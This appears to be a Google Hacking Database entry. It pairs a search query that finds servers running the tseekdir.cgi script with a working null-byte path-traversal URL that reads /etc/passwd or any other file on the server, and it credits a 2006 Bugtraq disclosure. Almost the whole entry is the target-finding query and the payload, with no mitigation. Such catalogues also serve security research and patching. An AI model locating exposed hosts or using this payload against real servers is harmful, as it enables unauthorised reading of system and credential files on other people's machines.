allinurl:tseekdir.cgi

GHDB-ID:

1377

Author:

anonymous

Google Dork Description:

allinurl:tseekdir.cgi

tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html